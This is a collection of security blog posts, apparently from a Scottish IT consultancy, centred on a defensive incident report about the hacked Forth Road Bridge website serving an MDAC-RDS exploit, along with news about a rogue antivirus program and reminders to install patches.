If you're new here, you may want to subscribe to our RSS newsfeed so you don't miss out on all the information, news, tips and tricks.
Thanks for visiting!

An informative video via Colin Mackay.

How To Behave On An Internet Forum

Technorati Tags: forums, Internet

Silicon.com is reporting the ICO reckons that government data breaches aren’t any worse of late! That means they’ve been losing data, putting the general public at risk, for some considerable time!

Fair enough the criminals are now using this data more effectively for their nefarious purposes, but it is alarming how far behind the government is in relation to protecting the most valuable assets of the general public - their identity and privacy.

Technorati Tags: data loss, ICO, security

Looks like the hackers have been in at the Cricket Scotland website - see image below.

The Associations Directory webpage has been filled full of links of a questionable nature.

Certainly looks like the hackers are going to town with Scottish websites at the moment!

Technorati Tags: cricket. Cricket Scotland, hackers, website defacement

The government is currently considering a plan to ban users that are caught illegally downloading copyrighted content. ISPs will have to monitor and ultimately terminate the customer’s internet access if they are found to be abusing copyright.

The BBC reports that “UK net firms are resisting government suggestions that they should do more to monitor what customers do online”.

Now for some Friday humour that complements this story nicely…

Further reading:

BBC Online

Times Online

Technorati Tags: anti-piracy, BBC, funny, humor, humour, Times Online, YouTube

On Wednesday evening, James Eaton-Lee of NGS Software and John A Thomson of Roundtrip Solutions presented to the IET South East Scotland Local Network.

The PDF version of the presentation is now available.

Please leave us a comment if you attended the event or have downloaded the presentation and have some comments or questions.

Technorati Tags: computer security, IET, NGS Software, Roundtrip Solutions

One of our earlier blog posts had Roger Thompson of AVG’s Exploit Preventions Labs running through MalwareAlarm in a well produced video. Well, XPantivirus is a new in the wild rogue security program, which comes from the same family of malware,

It uses some clever Javascript coding, just like MalwareAlarm, to force you down the road of running a fake security scan. In record breaking time, it comes back to announce the computer has some very scary looking malware installed, but their product can easily remove them for a nominal license fee. These results are completely bogus and have been faked by design to scare you into handing over your cash - a nice social engineering scam! No legitimate application would make it so hard to cancel out of installing it!

This one is so new that only 5 out of 32 security products used by VirusTotal can detect it. That means a significant proportion of people are currently running a system that cannot detect this nasty.

Don’t go near the website. Don’t install XPantivirus. Don’t give them payment details. Basically, don’t get caught out folks!

We’ll be keeping an eye on how the relevant security vendors respond to this one and will let you know in a follow-up post and vblog entry about security company response times.

Take care folks.

Technorati Tags: downloader, malware, MalwareAlarm, social engineering, Trojan, Virus Total, XP Antivirus, XPAntivirus

The FETA hacking incident fame is spreading. Here’s just some of the places we are being mentioned:

Website of UK landmark hacked to serve malware 
- TechWorld.com

Web site of U.K. landmark hacked to serve malware
- NetworkWorld

That’s Technical: Finjan reports Forth Road Bridge Web site serving up malware using code obfuscation techniques
- That’s Technical Blog

Forth Road Bridge hack redirects to smut bazaar
- Techie News Blog

Finjan reports Forth Road Bridge Web site serving up malware using code obfuscation techniques
- IT Analysis

Forth Road Bridge hack redirects to smut bazaar
- Global Security News

Website of UK landmark hacked to serve malware
- ComputerWorldUK

Website of UK landmark hacked to serve malware: related news
- Big Blog

Taking Guard
- Round the Wicket - The blog of Freuchie Cricket Club

Website of UK Landmark Hacked to Serve Malware
- Hack In The Box

Goodness this is becoming tedious :-). Go checkout Google for yourself to see just how big an issue this is in the online security community!

It would seem a company that makes security appliances, which protects from such attacks, is jumping on our bandwagon. They have pushed out press releases about this incident, but with a strong focus on their company and products! We have no problem with that as long as any reports show who really discovered the problem and link back to our discovery blog post on ever instance of the report. The title of the That’s Technical blog post is misleading at best. Come on guys, you could have made it much clearer in your press release who actually discovered the Forth Road Bridge break in and by the way, it was AVG’s LinkScanner Pro that was the real hero by way of the technology involved.

Technorati Tags: FETA, Forth Road Bridge, Freuchie Cricket Club, hacking

The Scotsman has now picked up The Register’s news story about the Forth Road Bridge hacking incident,

Go see it here or catch it on Page 21 of today’s paper.

Technorati Tags: Forth Road Bridge, hacking, Scotsman, The Register

It has been a busy few days for critical security updates for four common Windows applications. Go download and install the latest updates pronto if you’re running any of these applications:

1. Adobe Acrobat Reader
2. Apple Quicktime or Apple iTunes
3. Sun Microsystems Java
4. Skype

Click on any of the links above to go to the download location for that application.

Seems that Apple is pushing out security updates and fixed versions ever few weeks and have been doing this for quite some time now! Who said Apple’s software was safer!

Technorati Tags: Acrobat Reader, Adobe, Apple, Java, Quicktime, Skype, Sun Microsystems

Roger Thompson of AVG’s Exploit Preventions Labs has just produced this excellent video on how social engineering techniques are fooling people, even those who think they are safe using Firefox.

The bad guys are getting smarter! Be careful out there folks.

Technorati Tags: AVG, Exploit Labs, Firefox, MalwareAlarm, Roger Thompson, security, social engineering

John Leyden of The Register, one of the foremost IT news website on the Internet, has mentioned us in this news story. It was even a featured story at the top of their home page. Thank you John and thank you The Register.

So far there is no public notice on the FETA website of this incident. Perhaps they are working on the news that will inform their regular users that an incident occurred and it may have placed some of those folk’s computers at risk from all manner of malware.

This was a serious incident and don’t underestimate the impact it may have had on vulnerable computers out there! Public disclosure of the incident was only taken after the website had been taken down and fixed. We didn’t want to highlight the dangers only for curious users to go “have a look” and end up with even more systems being infected!

Technorati Tags: FETA, Forth Road Bridge, hack, John Layden, The Register

The Forth Road Bridge website is back online and is clean again.

Roger Thompson of AVG has a comprehensive techie write-up of the nature of the exploit and how it worked. We’d recommend you go read his blog entry on this alongside our own earlier blog post. He came to pretty much the same conclusions as we have, which is nice.

It would be really great to get a copy of their forensic investigation tool Web Radar. Perhaps one day they will release it to the general public or maybe allow a select few “security consultants” to be armed with a copy (hint, hint).

Thanks Roger and thanks AVG UK for helping to make today a safer place for the visitors of the FETA website. The folks over at FETA also deserve praise for their prompt actions in taking the website down and getting it back up and running safely in such a short time.

To all our readers, we recommend getting yourself a copy of LinkScanner Pro now! It could save your bacon!

Technorati Tags: AVG, exploit, FETA, MDAC-RDS, Neospoilt, Roger Thompson

John A Thomson, MD of Roundtrip Solutions, has just finished investigating a reported issue with the website of the Forth Estuary Transport Authority (FETA), otherwise known as the Forth Road Bridge website. This blog post will make for interesting reading, highlighting the changing nature of the web and how legitimate websites can be compromised to serve nasties to visitors.

Photo by Martin Third

One of our customers phoned to ask about an adult themed pop-up that appeared when visiting the Forth Road Bridge website. Unfortunately, we were unable to confirm they had actually visited the website and hadn’t mistakenly went to some porn website in the first place, but what we could confirm was an alarming situation with the FETA website at that time.

Upon visiting the website our security systems immediately alarmed off with reports of the website serving a MDAC-RDS exploit using the Neosploit Hacking Toolkit - see the image below for more details.

LinkScanner Pro, a product from Exploit Labs (recently bought by AVG), also reported a problem when it was used to evaluate Google search result for FETA - see below.

The exact wording used by LinkScanner Pro in its Exploit log was:

NeoSploit

This is an MDAC-RDS exploit, wrapped in an attempted polymorphic script generator.

Yikes! Sounds pretty nasty, doesn’t it? There is more detail here.

The Google cached page seemed to be unaffected initially, but then Google’s bots came roaming past and now it is also showing an exploited website.The conclusion from all this: the hack took place sometime late January, early February.

Next check was to ensure the domain was indeed owned by FETA by doing a domain lookup. Although the actual result was inconclusive, enough information could be surmised to say with a reasonable level of certainty that it was indeed the legitimate website. They obviously had Concillium UK as the supplier involved with the delivery of the website way back in 2003. We do wonder why the registrant details aren’t an address somewhere close to the bridge!

Whois Record

Domain:
        feta.gov.uk
Registered For:
        Forth Estuary Transport Authority
Domain Owner:
        Forth Estuary Transport Authority
Registered By:
        Lumison Ltd
Servers:
        ns0.lumison.net        
        ns.as12703.net        
Registrant Contact:
        Richard Abrams
Registrant Address:
        Consilium UK Ltd
        Mirren Court One
        119 Renfrew Road
        PA3 4ED
        United Kingdom
        +44 1418471545 (Phone)
        +44 8703305882 (FAX)
Entry updated:
        Friday 11th May 2007
Entry created:
        Wednesday 17th September 2003

It was worth checking the IP address was assigned to FETA in case the problem was down to some kind of DNS issue.

% This is the RIPE Whois query server #3.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Information related to ‘87.246.98.144 - 87.246.98.151′

inetnum:        87.246.98.144 - 87.246.98.151
netname:        LU4682
descr:          Internal infrastructure
country:        GB
admin-c:        LUMH-RIPE
tech-c:         LUMN-RIPE
status:         ASSIGNED PA
remarks:        INFRA-AW
mnt-by:         EDNET-RIPE-MNT
changed:        dns@ednet.co.uk 20051111
source:         RIPE

role:           Lumison Hostmaster
address:        Lumison Ltd
address:        12 Dock Place
address:        Edinburgh
address:        EH6 6LU
address:        UNITED KINGDOM
remarks:        trouble:      For customer support please email support@lumison.net
remarks:        trouble:      or call +44 (0)845 1199 999
remarks:        trouble:      For abuse reports please send to abuse@lumison.net
remarks:        trouble:      For peering requests please send to peering@lumison.net
mnt-by:         EDNET-RIPE-MNT
e-mail:         hostmaster@lumison.net
admin-c:        GA8874-RIPE
tech-c:         GA8874-RIPE
nic-hdl:        LUMH-RIPE
changed:        neil.saunders@lumison.net 20040816
changed:        neil.saunders@lumison.net 20040908
source:         RIPE
abuse-mailbox:  abuse@lumison.net

role:           Lumison NOC
address:        Lumison Ltd
address:        7 Claylands Road
address:        Newbridge
address:        EH28 8LF
address:        UNITED KINGDOM
remarks:        trouble: For customer support please email support@lumison.net
remarks:        trouble: or call +44 (0)845 1199 999
remarks:        trouble: For abuse reports please send to abuse@lumison.net
remarks:        trouble: For peering requests please send to peering@lumison.net
mnt-by:         EDNET-RIPE-MNT
admin-c:        GT73-RIPE
admin-c:        GA8874-RIPE
admin-c:        IM1814-RIPE
tech-c:         RM7978-RIPE
tech-c:         GT73-RIPE
tech-c:         IM1814-RIPE
nic-hdl:        LUMN-RIPE
source:         RIPE
abuse-mailbox:  abuse@lumison.net
changed:        ian.mackinnon@lumison.net 20060727
e-mail:         noc@lumison.net

% Information related to ‘87.246.64.0/18AS12703′

route:          87.246.64.0/18
descr:          Lumison Limited IP allocation.
origin:         AS12703
mnt-by:         EDNET-RIPE-MNT
changed:        dns@ednet.co.uk 20050908
source:         RIPE

Again, we had to surmise this was indeed the IP address of the FETA website! The FETA domain is pointing at Lumison’s name servers and Lumison owns the IP address range that contains the FETA website server. The bits of the puzzle kind of link up.

Now it was worth sniffing the website traffic to see where the compromise was occuring. After a little digging around, the exploit code was found fairly easily: the obfuscated Javascript made it stand out like a sore thumb. Very nasty indeed!This code made the browser connect to a server in Turkey with an IP address of 88.255.90.130. Most of the time this server returned instructions to look at the BBC website, but occasionally it delivered another Javascript payload, which could have done anything it liked!

To confirm the problem was indeed a genuine website compromise we referred the incident to Roger Thompson over at AVG. He’s the person with all the experience in dealing with LinkScanner Pro detected exploits. In fact, he got a mentioned in a Baseline Magzaine 2006 article that detailed this very same exploit when it was first being seen in the wild. Expect to see a blog post from Roger very soon on his findings for this incident. We expect he will have completed the last piece of the puzzle and know the particular nasties being pushed out by the Turkish server.

Once the compromised website had been confirmed, we immediately informed FETA IT management about this incident. They took down the website within minutes, no hanging around waiting for any third party supplier to confirm the compromise. Kudos to them.

Our guess at this point would be one of the following:

1. A server patch hadn’t been applied allowing the full server to be compromised. This could potentially be very painful for the web server supplier if it turns out to be the case.

2. The website is built using a content management systems called “Joomla“. It is possible it is using an older insecure Joomla core or an older insecure module. Maybe someone has forgot or neglected to patch the Joomla files.

3. Something else on the web server has been compromised allowing access to the FETA website files.

4. One of the website developers has a compromised workstation computer that allowed hackers to gain the FTP username and password directly using a key logger.

Only the hackers know the exact nature of the compromise, but the FETA IT team should be able to investigate the nature of the compromise using a good forensics specialist and be able to evaluate the scale of the problem, thereafter putting in place the necessary fixes to ensure better security of the website in the future!

People who’ve visited the website over the last week need only panic if they are running a version of Microsoft Windows that hasn’t been patched or a version before Windows 2000. Security products may also have caught this nasty and blocked it from gaining a hold. This exploit was addressed in Microsoft Security bulletin MS06-014, released 11 April, 2006, along with updates to the affected MDAC versions. Customers running Windows Vista are unlikely to have been affected by this exploit.

Our advice to anyone who has visited the FETA website since about the 1st February is to run a variety of security products including antivirus, antispyware and antirootkits through your system to ensure nothing has slipped through. It is also vital to keep up with both Microsoft and 3rd party application patches and updates.

If you have any doubts or queries then feel free to Contact Us for advice.

Technorati Tags: exploit, FETA, Fife, Forth Estuary Transport Authority, Forth Road Bridge, hacked, Joomla, MDAC-RDS, Roger Thompson, Windows

The Windows Vista blog has just announced the release to manufacturing of Windows Vista Service Pack 1.

This should fix some of the big issues that have seen slow adoption of Vista in the real world. Goodbye to the slowness and reliability problems of Vista! Well, fingers crossed.

Remember to backup your system before applying any major service pack. But alas, you’ll have to wait until mid March before it will be available on Microsoft Update.

Technorati Tags: Microsoft, Microsoft Update, Service Pack 1, Vista, Windows